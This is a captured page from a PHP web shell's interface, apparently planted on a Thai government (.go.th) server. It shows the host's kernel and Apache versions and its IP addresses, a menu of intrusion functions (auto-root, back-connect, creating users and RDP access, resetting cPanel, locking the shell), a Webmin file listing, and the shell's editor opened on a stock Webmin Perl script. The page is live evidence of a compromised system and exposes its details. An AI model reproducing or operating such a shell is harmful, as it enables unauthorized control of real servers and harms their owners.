Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
filemin /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
unauthenticated
[ DIR ]
drwxr-xr-x
CHANGELOG
9.23
KB
-rw-r--r--
acl_security.pl
2.24
KB
-rw-r--r--
bookmark.cgi
343
B
-rwxr-xr-x
chattr.cgi
1007
B
-rwxr-xr-x
chcon.cgi
979
B
-rwxr-xr-x
chmod.cgi
2.42
KB
-rwxr-xr-x
chown.cgi
983
B
-rwxr-xr-x
compress.cgi
750
B
-rwxr-xr-x
config
20
B
-rw-r--r--
config.cgi
2.08
KB
-rwxr-xr-x
config.info
112
B
-rw-r--r--
config.info.ar
205
B
-rw-r--r--
config.info.ca
120
B
-rw-r--r--
config.info.ca.UTF-8
122
B
-rw-r--r--
config.info.de
158
B
-rw-r--r--
config.info.de.UTF-8
158
B
-rw-r--r--
copy.cgi
362
B
-rwxr-xr-x
create_file.cgi
559
B
-rwxr-xr-x
create_folder.cgi
550
B
-rwxr-xr-x
cut.cgi
361
B
-rwxr-xr-x
defaultacl
373
B
-rw-r--r--
defaultuconf
95
B
-rw-r--r--
delete.cgi
352
B
-rwxr-xr-x
download.cgi
782
B
-rwxr-xr-x
edit_file.cgi
2.61
KB
-rwxr-xr-x
extract.cgi
1.44
KB
-rwxr-xr-x
filemin-lib.pl
17.17
KB
-rw-r--r--
http_download.cgi
1.36
KB
-rwxr-xr-x
index.cgi
2.73
KB
-rwxr-xr-x
module.info
137
B
-rw-r--r--
module.info.ar
116
B
-rw-r--r--
module.info.ca
88
B
-rw-r--r--
module.info.ca.UTF-8
101
B
-rw-r--r--
module.info.de
88
B
-rw-r--r--
module.info.de.UTF-8
100
B
-rw-r--r--
module.info.no
22
B
-rw-r--r--
module.info.no.UTF-8
28
B
-rw-r--r--
paste.cgi
1.23
KB
-rwxr-xr-x
rename.cgi
431
B
-rwxr-xr-x
safeacl
50
B
-rw-r--r--
save_config.cgi
740
B
-rwxr-xr-x
save_file.cgi
705
B
-rwxr-xr-x
search.cgi
602
B
-rwxr-xr-x
upload.cgi
3.01
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : save_file.cgi
#!/usr/bin/perl require './filemin-lib.pl'; &ReadParse(); get_paths(); my @errors; # Validate inputs my $file = &simplify_path($cwd.'/'.$in{'file'}); &check_allowed_path($file); $data = $in{'data'}; $data =~ s/\r\n/\n/g; if ( $in{'encoding'} && lc( $in{'encoding'} ) ne "utf-8" ) { eval { $data = Encode::encode( $in{'encoding'}, Encode::decode( 'utf-8', $data ) ) }; } &open_tempfile(SAVE, ">$file") || &error($text{'error_saving_file'}." : ".&html_escape("$!")); &print_tempfile(SAVE, $data); &close_tempfile(SAVE); if ($in{'save_close'}) { &redirect("index.cgi?path=".&urlize($path)); } else { &redirect("edit_file.cgi?path=".&urlize($path). "&file=".&urlize($in{'file'})); }
Close